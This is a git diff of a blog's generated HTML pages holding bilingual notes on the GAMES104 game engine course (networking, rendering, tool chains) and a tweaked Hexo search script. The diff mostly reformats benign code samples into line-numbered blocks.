        if((isock=accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 8) { // accept one
        printf("Error accepting\n");
        ...
        }

        Setup Socket

        安装套接字

        Both client and server need to setup the socket

        @@ -1403,7 +1401,7 @@

        Communication Wa

        消息不是一种自然的编程模式

      -
      struct foomsg {
      uint32 _t len;
      };

      void send_foo(char *contents) {
      int msglen = sizeof(struct foomsg) + strlen(contents);
      char buf = malloc(msglen);
      struct foomsg *fm = (struct foomsg *)buf;
      fm->len = htonl(strlen(contents));
      memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
      write(outsock,buf, msglen);
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      struct foomsg {
      uint32 _t len;
      };

      void send_foo(char *contents) {
      int msglen = sizeof(struct foomsg) + strlen(contents);
      char buf = malloc(msglen);
      struct foomsg *fm = (struct foomsg *)buf;
      fm->len = htonl(strlen(contents));
      memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
      write(outsock,buf, msglen);
      }

      More Challenges on Logic Communication

      逻辑通信面临更多挑战

        @@ -1527,7 +1525,7 @@

        //polyline.proto
        syntax ="proto2";

        message Point {
        required int32 x = 1;
        required int32 y = 2;
        optional string label = 3;
        }

        message Line {
        required Point start = 1;
        required Point end = 2;
        optional string label = 3;
        }

        message Polyline {
        repeated Point point = 1;
        optional string label = 2;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        //polyline.proto
        syntax ="proto2";

        message Point {
        required int32 x = 1;
        required int32 y = 2;
        optional string label = 3;
        }

        message Line {
        required Point start = 1;
        required Point end = 2;
        optional string label = 3;
        }

        message Polyline {
        repeated Point point = 1;
        optional string label = 2;
        }

        RPC Stubs

        • @@ -2295,7 +2293,7 @@

          Random Number

        webp

        -
        int main() {
        std::default random engine e;
        std::uniform int distribution<int> u(0,100);
        e.seed(80);

        for(int i = 0; i < 20; i++) {
        std::cout << u(e) << std::endl;
        }

        return 0;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        int main() {
        std::default random engine e;
        std::uniform int distribution<int> u(0,100);
        e.seed(80);

        for(int i = 0; i < 20; i++) {
        std::cout << u(e) << std::endl;
        }

        return 0;
        }

        Deterministic Solution

        确定性解

          @@ -2500,7 +2498,7 @@

          Quick Catch Up

          如果最初每秒 10 帧,在追逐帧时,它可能每秒运行 100 帧

        -
        float m_delta = 0;
        float m_tick_delta = 100;
        void CBattleLayer::update(float delta) {
        // do something
        m_delta += delta;
        int exec_count = 1;
        while(m_delta >= m_tick_delta) {
        m_delta -= m_tick_delta;
        // logic frame
        if(!logicUpdate(LOGIC_TIME)) {
        return;
        }
        // catch up 10 frames at a time
        if(exec_count++ >= 10){
        break;
        }
        }
        // do something
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        float m_delta = 0;
        float m_tick_delta = 100;
        void CBattleLayer::update(float delta) {
        // do something
        m_delta += delta;
        int exec_count = 1;
        while(m_delta >= m_tick_delta) {
        m_delta -= m_tick_delta;
        // logic frame
        if(!logicUpdate(LOGIC_TIME)) {
        return;
        }
        // catch up 10 frames at a time
        if(exec_count++ >= 10){
        break;
        }
        }
        // do something
        }

        Server State Snapshot Optimization

        服务器状态快照优化

          @@ -8961,6 +8959,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Physics/index.html b/posts/GAMES104-Physics/index.html index 854572f59e..0d227dede5 100644 --- a/posts/GAMES104-Physics/index.html +++ b/posts/GAMES104-Physics/index.html @@ -44,8 +44,6 @@ - - @@ -6848,6 +6846,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Rendering/index.html b/posts/GAMES104-Rendering/index.html index 3daa60f052..a33d0be5d8 100644 --- a/posts/GAMES104-Rendering/index.html +++ b/posts/GAMES104-Rendering/index.html @@ -44,8 +44,6 @@ - - @@ -1319,7 +1317,7 @@

          Starting f

          ​ 暂时忘记一些抽象概念,即。光能传递、微面、BRDF 等

          Simple Light Solution

          webp

          -
          glLightfv(GL_LIGHTO, GL_AMBIENT, light_ambient);
          glLightfv(GL_LIGHTO, GL_DIFFUSE, light_diffuse);
          glLightfv(GL_LIGHTO,GL_SPECULAR, light_specular);
          glLightfv(GL_LIGHTO, GL_POSITION, light_position);
          +
          1
          2
          3
          4
          glLightfv(GL_LIGHTO, GL_AMBIENT, light_ambient);
          glLightfv(GL_LIGHTO, GL_DIFFUSE, light_diffuse);
          glLightfv(GL_LIGHTO,GL_SPECULAR, light_specular);
          glLightfv(GL_LIGHTO, GL_POSITION, light_position);
          • Using simple light source as main light

            @@ -1362,7 +1360,7 @@

            void main()
            {
            vec3 N = normalize(normal);
            vec3 V = normalize(camera position - world position);
            vec3 R = reflect(v, N);
            FragColor = texture(cube texture, R);
            }
            +
            1
            2
            3
            4
            5
            6
            7
            void main()
            {
            vec3 N = normalize(normal);
            vec3 V = normalize(camera position - world position);
            vec3 R = reflect(v, N);
            FragColor = texture(cube texture, R);
            }

            Early stage exploration of image-based lighting

            ​ 基于图像的照明的早期探索

            Math Behind Light Combo

            @@ -1458,7 +1456,7 @@

            Shadow Map

            ​ 计算出阴影贴图。用一张 texture 表示阴影。

            webp

            -
            // project our 3D position to the shadow map
            vec4 proj_pos = shadow viewproj * pos;
            // from homogeneous space to clip space
            vec2shadow_uv = proj_pos.xy / proj_pos.w;
            // from clip space to uv space
            shadow_uv = shadow_uv * 0.5 + vec2(0.5)
            // get point depth (from -1 to 1)
            float real_depth = proj_pos.z / proj_pos.w;
            // normalize from [-1..+1] to [0..+1]
            real_depth = real_depth * 0.5 + 0.5;
            // read depth from depth buffer in [0..+1]
            float shadow_depth = texture(shadowmap, shadow_uv).x;
            // compute final shadow factor by comparing
            float shadow_factor = 1.0;
            if(shadow_depth < real_depth)
            shadow_factor =0.0;
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            // project our 3D position to the shadow map
            vec4 proj_pos = shadow viewproj * pos;
            // from homogeneous space to clip space
            vec2shadow_uv = proj_pos.xy / proj_pos.w;
            // from clip space to uv space
            shadow_uv = shadow_uv * 0.5 + vec2(0.5)
            // get point depth (from -1 to 1)
            float real_depth = proj_pos.z / proj_pos.w;
            // normalize from [-1..+1] to [0..+1]
            real_depth = real_depth * 0.5 + 0.5;
            // read depth from depth buffer in [0..+1]
            float shadow_depth = texture(shadowmap, shadow_uv).x;
            // compute final shadow factor by comparing
            float shadow_factor = 1.0;
            if(shadow_depth < real_depth)
            shadow_factor =0.0;

            Problem of Shadow Map

            webp

            Resolution is limited on texture

            @@ -1790,13 +1788,13 @@

            // Geometry Term: Geometry masking/shadowing due to microfacets
            float GGr(float Ndotv, float k) {
            return Ndotv / (Ndotv * (1.0 - k) + k);
            }
            float G_Smith(float Ndotv, float NdotL, float roughness) {
            float k = pow(roughness + 1.0, 2.0) / 8.0;
            return GGX(NdotL, k) * GGr(Ndotv, k);
            }
            +
            1
            2
            3
            4
            5
            6
            7
            8
            // Geometry Term: Geometry masking/shadowing due to microfacets
            float GGr(float Ndotv, float k) {
            return Ndotv / (Ndotv * (1.0 - k) + k);
            }
            float G_Smith(float Ndotv, float NdotL, float roughness) {
            float k = pow(roughness + 1.0, 2.0) / 8.0;
            return GGX(NdotL, k) * GGr(Ndotv, k);
            }

            Fresnel Equation

            ​ 当视角接近反射平面时,反射率会急剧上升。

            webp

            $$\begin{aligned}&f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}\&F_{Schlick}(h,\nu,F_{0})=F_{0}+(1-F_{0})\left(1-(\nu\cdot h)\right)^{5}\end{aligned}$$

            ​ 这个 5 次方是数学家推导出来的。

            -
            // Fresnel term with scalar optimization
            float F Schlick(float VoH, float f0) {
            float f = pow(1.0 - VoH, 5.0);
            return f0 + (1.0 - f0) * f;
            }
            +
            1
            2
            3
            4
            5
            // Fresnel term with scalar optimization
            float F Schlick(float VoH, float f0) {
            float f = pow(1.0 - VoH, 5.0);
            return f0 + (1.0 - f0) * f;
            }

            Physical Measured Material

            webp

            MERL BRDF Database of measured materials

            @@ -2009,7 +2007,7 @@

            Step

            ​ 一旦每个级联的深度贴图都准备好了,就可以在渲染阴影的阶段使用它们。具体来说,对于每个要接受阴影的像素,都会根据其在世界空间中的位置和光源的视角来计算其在每个级联深度贴图中的深度值。然后,通过比较每个像素的深度值与相应级联深度贴图中的深度值,就可以确定像素是否在阴影中。

            webp

            -
            splitFrustumToSubfrusta();
            calculateOrthoProjectionsForEachSubfrustum();
            renderShadowMapForEachSubfrustum();
            renderScene();

            vs_main() {
            calculateWorldPosition()
            }

            ps_main() {
            transformWorldPositionsForEachProjections()
            sampleAllShadowMaps()
            compareDepthAndLightingPixel()
            ...
            }
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            splitFrustumToSubfrusta();
            calculateOrthoProjectionsForEachSubfrustum();
            renderShadowMapForEachSubfrustum();
            renderScene();

            vs_main() {
            calculateWorldPosition()
            }

            ps_main() {
            transformWorldPositionsForEachProjections()
            sampleAllShadowMaps()
            compareDepthAndLightingPixel()
            ...
            }

            Blend between Cascade Layers

            ​ 级联层之间的混合

            webp

            @@ -2240,7 +2238,7 @@

            Ub

            通过预定义宏编译为许多变体短着色器

          -
          // sky light
          #if ENABLE SKY LIGHT
          #if MATERIAL TWOSIDED && LQ_TEXTURE_LIGHTMAP
          if(NoL == 0) {
          #endif

          #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
          ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuselighting;
          #endif

          Color += SkyDiffuselighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialA0;
          #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
          }
          #endif
          #endif
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          // sky light
          #if ENABLE SKY LIGHT
          #if MATERIAL TWOSIDED && LQ_TEXTURE_LIGHTMAP
          if(NoL == 0) {
          #endif

          #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
          ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuselighting;
          #endif

          Color += SkyDiffuselighting * half3(ResolvedView.SkylightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialA0;
          #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
          }
          #endif
          #endif

          Shader Variants Example In Real Game

          ​ 真实游戏中的着色器变体示例

          webp

          @@ -2469,16 +2467,16 @@

          Terrain Material

          Simple Texture Splatting

          ​ 简单的纹理喷溅

          webp

          -
          float3 blend(float4 texturel,float al, float4 texture2, float a2) {
          return texturel.rgb * al + texture2.rgb * a2;
          }
          +
          1
          2
          3
          float3 blend(float4 texturel,float al, float4 texture2, float a2) {
          return texturel.rgb * al + texture2.rgb * a2;
          }

          ​ terrain 上的纹理从一个过渡到另一个时,如果简单地使用混合,则平滑但不自然。

          Advanced Texture Splatting

          webp

          -
          float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
          return height1 > height2 ? texture1.rgb : texture2.rgb;
          }
          +
          1
          2
          3
          float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
          return height1 > height2 ? texture1.rgb : texture2.rgb;
          }

          ​ 根据高度图实现材质的过渡。

          Advanced Texture Splatting - Biased

          webp

          ​ 引入 Height Bias。

          -
          float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
          float depth = 0.2;
          float ma = max(texture1.a + height1, texture2.a + height2) - depth;
          float b1 = max(texture1.a + height1 - ma, 0);
          float b2 = max(texture2.a + height2 - ma, 0);
          return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
          }
          +
          1
          2
          3
          4
          5
          6
          7
          float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
          float depth = 0.2;
          float ma = max(texture1.a + height1, texture2.a + height2) - depth;
          float b1 = max(texture1.a + height1 - ma, 0);
          float b2 = max(texture2.a + height2 - ma, 0);
          return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
          }

          Sampling from Material Texture Array

          ​ 从材质纹理数组采样

          webp

          @@ -3079,7 +3077,7 @@

          FXAA (Fast Approximate Anti-aliasing)

          ​ FXAA(快速近似抗锯齿)

          webp

          -
          M: Luminance of middle pixel
          (L = 0.299 * R + 0.587 * G + 0.114 * B)

          #define MinThreshold 0.05

          float MaxLuma = max(N, E,W, S, M);
          float MinLuma = min(N, E, W, S, M);
          float Contrast = MaxLuma - MinLuma;
          if(Contrast >= MinThreshold)
          ...
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          M: Luminance of middle pixel
          (L = 0.299 * R + 0.587 * G + 0.114 * B)

          #define MinThreshold 0.05

          float MaxLuma = max(N, E,W, S, M);
          float MinLuma = min(N, E, W, S, M);
          float Contrast = MaxLuma - MinLuma;
          if(Contrast >= MinThreshold)
          ...

          Anti-aliasing based on 1x rendered image

          ​ 基于 1x 渲染图像的抗锯齿

            @@ -3175,7 +3173,7 @@

            float threshold;
            float4 computeHighlightArea()
            {
            [...] // first do normal lighting calculations and output results
            float4scene_color = float4(lighting, 1.0f);
            // check whether fragment output is higher than threshold, if so output as highlight color
            float luminance = dot(scene_color.rgb, vec3(0.2126f, 0.7152f, 0.0722f));

            float4highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
            if(luminance > threshold)
            highlight color = float4(scene_color.rgb, 1.0f);
            return highlight_color;
            }
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            float threshold;
            float4 computeHighlightArea()
            {
            [...] // first do normal lighting calculations and output results
            float4scene_color = float4(lighting, 1.0f);
            // check whether fragment output is higher than threshold, if so output as highlight color
            float luminance = dot(scene_color.rgb, vec3(0.2126f, 0.7152f, 0.0722f));

            float4highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
            if(luminance > threshold)
            highlight color = float4(scene_color.rgb, 1.0f);
            return highlight_color;
            }

            Gaussian Blur

            webp

            ​ 使用二维正态分布的卷积核进行卷积作高斯模糊。

            @@ -3206,7 +3204,7 @@

            Tone Mapping

            Tone Mapping Curve

            ​ 色调映射曲线

            webp

            -
            float3 F(float3 x)
            {
            const float A = 0.22f;
            const float B = 0.30f;
            const float C = 0.10f;
            const float D = 0.20f;
            const float E = 0.01f;
            const float F = 0.30f;
            return((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
            }

            float3 Uncharted2ToneMapping(float3 color, float adapted lum)
            {
            const float WHITE = 11.2f;
            return F(1.6f * adapted_lum * color) / F(WHITE);
            }
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            11
            12
            13
            14
            15
            16
            float3 F(float3 x)
            {
            const float A = 0.22f;
            const float B = 0.30f;
            const float C = 0.10f;
            const float D = 0.20f;
            const float E = 0.01f;
            const float F = 0.30f;
            return((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
            }

            float3 Uncharted2ToneMapping(float3 color, float adapted lum)
            {
            const float WHITE = 11.2f;
            return F(1.6f * adapted_lum * color) / F(WHITE);
            }
            • Get a filmic look without making renders dirty

              @@ -3342,7 +3340,7 @@

              Redering Pipelin

            Forward Rendering

            -
            for n meshes
            for m lights
            color += shading(mesh, light)
            +
            1
            2
            3
            for n meshes
            for m lights
            color += shading(mesh, light)

            ​ 按顺序渲染。

            webp

            Sort and Render Transparent after Opaque Objects

            @@ -7453,6 +7451,8 @@

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/GAMES104-Tool Chains/index.html b/posts/GAMES104-Tool Chains/index.html index 6264c5f665..57617ba27b 100644 --- a/posts/GAMES104-Tool Chains/index.html +++ b/posts/GAMES104-Tool Chains/index.html @@ -44,8 +44,6 @@ - - @@ -542,7 +540,7 @@

            Immediate Mode

            描述渲染图元的数据直接从客户端逐帧插入到命令列表中

          -
          Imgui::DrawButton("hello", 12, 24, &callback_func);
          +
          1
          Imgui::DrawButton("hello", 12, 24, &callback_func);

          webp

          Characteristic

          ​ 特点

          @@ -612,7 +610,7 @@

          Retained Mode

          客户端调用图形库不会直接导致实际渲染,而是利用图形库管理的大量间接资源。

        -
        HorizontalLayout layout = new HorizontalLayout();
        Button button = new Button();
        button.setText("Hello!");
        button.setwidth(12);
        button.setHeight(24);
        button.setcallback(&callback_func);
        layout.Add(button);
        +
        1
        2
        3
        4
        5
        6
        7
        HorizontalLayout layout = new HorizontalLayout();
        Button button = new Button();
        button.setText("Hello!");
        button.setwidth(12);
        button.setHeight(24);
        button.setcallback(&callback_func);
        layout.Add(button);

        webp

        Characteristic

        ​ 特点

        @@ -889,20 +887,20 @@

        Endianness

        Unreal:

        -
        /**
        Returns true if data larger than 1 byte shouldbe swapped to deal with endian mismatches.
        如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
        */
        FORCEINLINE bool IsByteSwapping()
        {
        #if PLATFORM LITTLE ENDIAN
        bool SwapBytes = ArForceByteSwapping;
        #else
        bool SwapBytes = this->IsPersistent();
        #endif
        return SwapBytes;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        /**
        Returns true if data larger than 1 byte shouldbe swapped to deal with endian mismatches.
        如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
        */
        FORCEINLINE bool IsByteSwapping()
        {
        #if PLATFORM LITTLE ENDIAN
        bool SwapBytes = ArForceByteSwapping;
        #else
        bool SwapBytes = this->IsPersistent();
        #endif
        return SwapBytes;
        }

        Asset Version Compatibility

        ​ 资源版本兼容性

        webp

        Add or Remove Field

        ​ 添加或删除字段

        origin class:

        -
        class GameObject
        {
        private:
        GUID guid;
        string name;
        Transform transform;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        class GameObject
        {
        private:
        GUID guid;
        string name;
        Transform transform;
        }

        old data:

        -
        {
        "guid": "092xtwg2u4ik1359",
        "name":"Alice",
        "transform": {
        "position": {
        "x": 0,
        "y": 0,
        "Z": -0.1
        }
        "rotate": {},
        "scale": {
        "x": 1,
        "y": 1,
        "z": 1
        }
        }
        }
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        {
        "guid": "092xtwg2u4ik1359",
        "name":"Alice",
        "transform": {
        "position": {
        "x": 0,
        "y": 0,
        "Z": -0.1
        }
        "rotate": {},
        "scale": {
        "x": 1,
        "y": 1,
        "z": 1
        }
        }
        }

        updated class 1

        -
        class Gameobject
        {
        private:
        GUID guid;
        string name;
        }
        +
        1
        2
        3
        4
        5
        6
        class Gameobject
        {
        private:
        GUID guid;
        string name;
        }

        updated class 2

        -
        class Gameobject {
        private:
        GUID guid;
        string name;
        Transform transform;
        BoundingBox bbox;
        }
        +
        1
        2
        3
        4
        5
        6
        7
        class Gameobject {
        private:
        GUID guid;
        string name;
        Transform transform;
        BoundingBox bbox;
        }

        Solve Compatibility by Version Hardcode

        ​ 通过版本硬编码解决兼容性问题

        Unreal: add version to asset

        @@ -917,7 +915,7 @@

        class Gameobject:
        int x = default;
        float y= default;
        bool z= default; // new field

        function Deserialize(data):
        x = data.GetValue<int>("x");
        y = data.GetValue<float>("y");
        if(GetCurrentVersion() >= data.version){
        z= data.GetValue<bool>("z");
        }

        function Serialize(data):
        data.SetValue<int>("x", x);
        data.setValue<float>("y", y);
        data.SetValue<bool>("z" z);
        data.UpdateVersion(GetcurrentVersion());
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        class Gameobject:
        int x = default;
        float y= default;
        bool z= default; // new field

        function Deserialize(data):
        x = data.GetValue<int>("x");
        y = data.GetValue<float>("y");
        if(GetCurrentVersion() >= data.version){
        z= data.GetValue<bool>("z");
        }

        function Serialize(data):
        data.SetValue<int>("x", x);
        data.setValue<float>("y", y);
        data.SetValue<bool>("z" z);
        data.UpdateVersion(GetcurrentVersion());

        Solve Compatibility by Field UID

        ​ 通过字段 UID 解决兼容性问题

        Google protocol buffers:

        @@ -958,7 +956,7 @@

        message PrefabobjectBinary{
        string guid = 1;
        string_file_name = 2;
        repeated string_game_object_guid_list = 3;
        }
        +
        1
        2
        3
        4
        5
        message PrefabobjectBinary{
        string guid = 1;
        string_file_name = 2;
        repeated string_game_object_guid_list = 3;
        }

        webp

        How to Make a Robust Tools

        ​ 如何制作一个鲁棒的游戏引擎?

        @@ -991,7 +989,7 @@

        Command-Defini

        每个系统(想要支持撤消/重做/崩溃恢复…)都需要实现从 lCommand<TData> 继承的系统相关命令。

      -
      public interfaceICommand<TData>
      {
      long UID { get; set; }
      TData Data { get; set;}
      void Invoke();
      void Revoke();
      byte[] Serialize();
      void Deserialize(byte[] data);
      }
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      public interfaceICommand<TData>
      {
      long UID { get; set; }
      TData Data { get; set;}
      void Invoke();
      void Revoke();
      byte[] Serialize();
      void Deserialize(byte[] data);
      }

      Command-UID

      Commands need strictly follow the sequence when recovery from disk

      ​ 从磁盘恢复时命令需要严格遵循顺序

      @@ -1152,7 +1150,7 @@

      Schema-Inherit

      Abstraction of the inheritance relationship of the world

      ​ 世界继承关系的抽象

      webp

      -
      class A {/*...*/};
      class B:A {/*...*/};
      class C:A {/*...*/};
      +
      1
      2
      3
      class A {/*...*/};
      class B:A {/*...*/};
      class C:A {/*...*/};

      Schema-Data Reference

      Abstract of the reference relationship of the world

      ​ 世界引用关系的抽象

      @@ -1234,7 +1232,7 @@

      Runtime View

      以更快的速度计算

    -
    class RuntimeSpotlight
    {
    public:
    // Spot Light Translation Matrix
    Matrix4x4 light trans {Matrix4x4::IDENTITY};
    // Spot Light Cone
    float inner_cone_radian = 0.0f;
    float outer_cone radian = 0.0f;
    // Spot Light intensity and units
    float intensity = 0.0f;
    LightUnits unit= CANDELA;
    // Spot Light Color
    Vector4 light color {Vector4::ZERO};
    // other light data like shadow...
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class RuntimeSpotlight
    {
    public:
    // Spot Light Translation Matrix
    Matrix4x4 light trans {Matrix4x4::IDENTITY};
    // Spot Light Cone
    float inner_cone_radian = 0.0f;
    float outer_cone radian = 0.0f;
    // Spot Light intensity and units
    float intensity = 0.0f;
    LightUnits unit= CANDELA;
    // Spot Light Color
    Vector4 light color {Vector4::ZERO};
    // other light data like shadow...
    }

    Storage View

    Focus:

    ​ 重点:

    @@ -1248,7 +1246,7 @@

    Storage View

    占用更少的硬盘空间

    -
    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..

    Tools View

    webp

    Focus:

    @@ -2005,16 +2003,16 @@

    Visu

    ​ 可视化编程系统,如蓝图。

    Hard Code Method for More Feature

    ​ 硬编码方法实现更多功能,但是代码也更复杂。

    -
    class Human: public object{
    void Jump() {
    // do something ...
    }
    void StopJump() {
    // do something ...
    }
    }
    -
    void CallFunction(object* instance, string type_name, string func_name)
    {
    if (type_name == "Human") {
    Human* human = (Human*)instance;
    if (func_name == "Jump") {
    human->Jump();
    }
    else if(func_name == "StopJump"){
    human->StopJump();
    }
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    class Human: public object{
    void Jump() {
    // do something ...
    }
    void StopJump() {
    // do something ...
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    void CallFunction(object* instance, string type_name, string func_name)
    {
    if (type_name == "Human") {
    Human* human = (Human*)instance;
    if (func_name == "Jump") {
    human->Jump();
    }
    else if(func_name == "StopJump"){
    human->StopJump();
    }
    }
    }

    A Common Solution - Reflection

    ​ 常见解决方案 - 反射

    In computer science, reflective programming or reflection is the ability of a process to examine, introspect and modify its own structure and behavior.

    ​ 在计算机科学中,反射编程或反射是指进程检查、自省和修改自身结构和行为的能力。

    ​ 现在高级的语言编程都有反射的设计。

    JAVA Reflection

    -
    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    -
    package Demo;
    import java.lang.refelect.Field;
    import java.lang.refelect.Method;
    public class Demo {
    public static void main(String[] args) throws Exception {
    Class<?> cls = Class.forName("Demo.test");
    Object obj = cls.getConstructor().newInstance();
    Field filed_accessor = cls.getField("m_filed");
    filed_accessor.set(obj, 2);

    Method method_accessor = cls.getMethod("print");
    method_accessor.invoke(obj);
    }
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    package Demo;
    public class Test {
    public int m_filed;
    public void print()
    {
    System.out.print("call print().");
    };
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    package Demo;
    import java.lang.refelect.Field;
    import java.lang.refelect.Method;
    public class Demo {
    public static void main(String[] args) throws Exception {
    Class<?> cls = Class.forName("Demo.test");
    Object obj = cls.getConstructor().newInstance();
    Field filed_accessor = cls.getField("m_filed");
    filed_accessor.set(obj, 2);

    Method method_accessor = cls.getMethod("print");
    method_accessor.invoke(obj);
    }
    }

    Reflection Build the Bridge between Code and Tools

    ​ 反射在代码和工具之间搭建桥梁

    Using reflection to generate a code meta information map

    @@ -2028,8 +2026,8 @@

    class Human: public Object {
    void Jump() {
    // do something ...
    }

    void StopJump() {
    // do something ...
    }
    }
    -
    void callFunction(object* instance, string type_name, string func_name)
    {
    FunctionPtr function_ptr = FunctionInfoMap::getInvokefunction(instance, type_name, func_name);
    function ptr->invoke();
    }
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    class Human: public Object {
    void Jump() {
    // do something ...
    }

    void StopJump() {
    // do something ...
    }
    }
    +
    1
    2
    3
    4
    5
    void callFunction(object* instance, string type_name, string func_name)
    {
    FunctionPtr function_ptr = FunctionInfoMap::getInvokefunction(instance, type_name, func_name);
    function ptr->invoke();
    }

    How to Implement Reflection in C++

    ​ 如何在 C++ 中实现反射

      @@ -6443,6 +6441,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html" "b/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html" index 36c029f306..0107740c98 100644 --- "a/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html" +++ "b/posts/Game-\347\273\231\350\246\201\345\205\263\351\227\250\347\232\204\347\202\211\347\237\263\344\270\212\344\270\252\351\246\231/index.html" @@ -51,8 +51,6 @@ - - @@ -408,12 +406,12 @@

      Game-给要关门的炉石上个香

    ​ 核心就是下面这个 search.js 了,魔改一下:

    -
    // search.js
    // A local search script with the help of hexo-generator-search
    // Copyright (C) 2015
    // Joseph Pan <http://github.com/wzpan>
    // Shuhao Mao <http://github.com/maoshuhao>
    // This library is free software; you can redistribute it and/or modify
    // it under the terms of the GNU Lesser General Public License as
    // published by the Free Software Foundation; either version 2.1 of the
    // License, or (at your option) any later version.
    //
    // This library is distributed in the hope that it will be useful, but
    // WITHOUT ANY WARRANTY; without even the implied warranty of
    // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
    // Lesser General Public License for more details.
    //
    // You should have received a copy of the GNU Lesser General Public
    // License along with this library; if not, write to the Free Software
    // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    // 02110-1301 USA

    var searchFunc = function (path, search_id, content_id, match_count_id) {
    $.ajax({
    url: path,
    dataType: "xml",
    success: function (xmlResponse) {
    // get the contents from search data
    var datas = $("entry", xmlResponse).map(function () {
    return {
    title: $("title", this).text(),
    content: $("content", this).text(),
    url: $("url", this).text()
    };
    }).get();
    var $input = document.getElementById(search_id);
    var $resultContent = document.getElementById(content_id);
    $input.addEventListener('input', function () {
    var str = '<ul class=\"search-result-list\">';
    var keywords = this.value.trim().split(/[\s\-]+/); // .toLowerCase().split(/[\s\-]+/);
    $resultContent.innerHTML = "";
    if (this.value.trim().length <= 0) {
    document.getElementById(match_count_id).textContent = "";
    return;
    }
    // perform local searching
    datas.forEach(function (data) {
    var isMatch = true;
    if (!data.title || data.title.trim() === '') {
    data.title = "Untitled";
    }
    var data_title = data.title.trim();//.toLowerCase();
    var data_content = data.content.trim().replace(/<[^>]+>/g, "");//.toLowerCase();
    var data_url = data.url;
    var index_title = -1;
    var index_content = -1;
    var first_occur = -1;
    // only match artiles with not empty contents
    if (data_content !== '') {
    keywords.forEach(function (keyword, i) {
